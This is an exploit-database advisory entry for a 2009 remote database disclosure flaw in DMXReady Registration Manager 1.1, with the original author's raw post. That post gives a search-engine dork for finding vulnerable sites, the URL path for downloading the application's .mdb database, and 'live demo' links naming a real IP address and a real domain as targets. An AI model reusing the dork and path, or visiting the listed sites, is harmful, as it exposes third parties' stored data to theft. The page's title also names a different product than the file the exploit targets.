DMXReady Registration Manager 1.1 Remote Database Disclosure Vulnerability

vendor:

Registration Manager

by:

S4S-T3rr0r!sT

7,5

CVSS

HIGH

Remote Database Disclosure

200

CWE

Product Name: Registration Manager

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

DMXReady Registration Manager 1.1 Remote Database Disclosure Vulnerability

An attacker can exploit this vulnerability by accessing the webblogmanager.mdb file located in the databases directory of the vulnerable application. This file contains the database information of the application.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the application.

Source

Exploit-DB raw data:

************************************************** *****************************
# Title : DMXReady Registration Manager 1.1 Remote Database Disclosure Vulnerability
# Author : S4S-T3rr0r!sT
# Contact : l3t@hotmail.com / S4S@n2m3.com
# S.Page : DMXReady CMS Plugin Applications Web Site Design Extensions Dreamweaver ASP Template Database Driven
# Site : WwW.s3curi7y.com / www.h-t.cc
************************************************** *****************************

D0rk : "inurl:inc_webblogmanager.asp"

Exploit :

# http://[target].com/[path]/databases/webblogmanager.mdb

l!ve D3mo :

# http://74.200.213.93/databases/webblogmanager.mdb
# http://www.nomorewar.com/databases/webblogmanager.mdb


V1V4 GaZa

./Done

Thanx To : Cold-Z3ro , HcJ , ViRuSMaN , AlQaYsAr , zAx , Cyb3r-Err0r ,Arabic S3curi7y crew Members, all arabian hacker

# milw0rm.com [2009-05-15]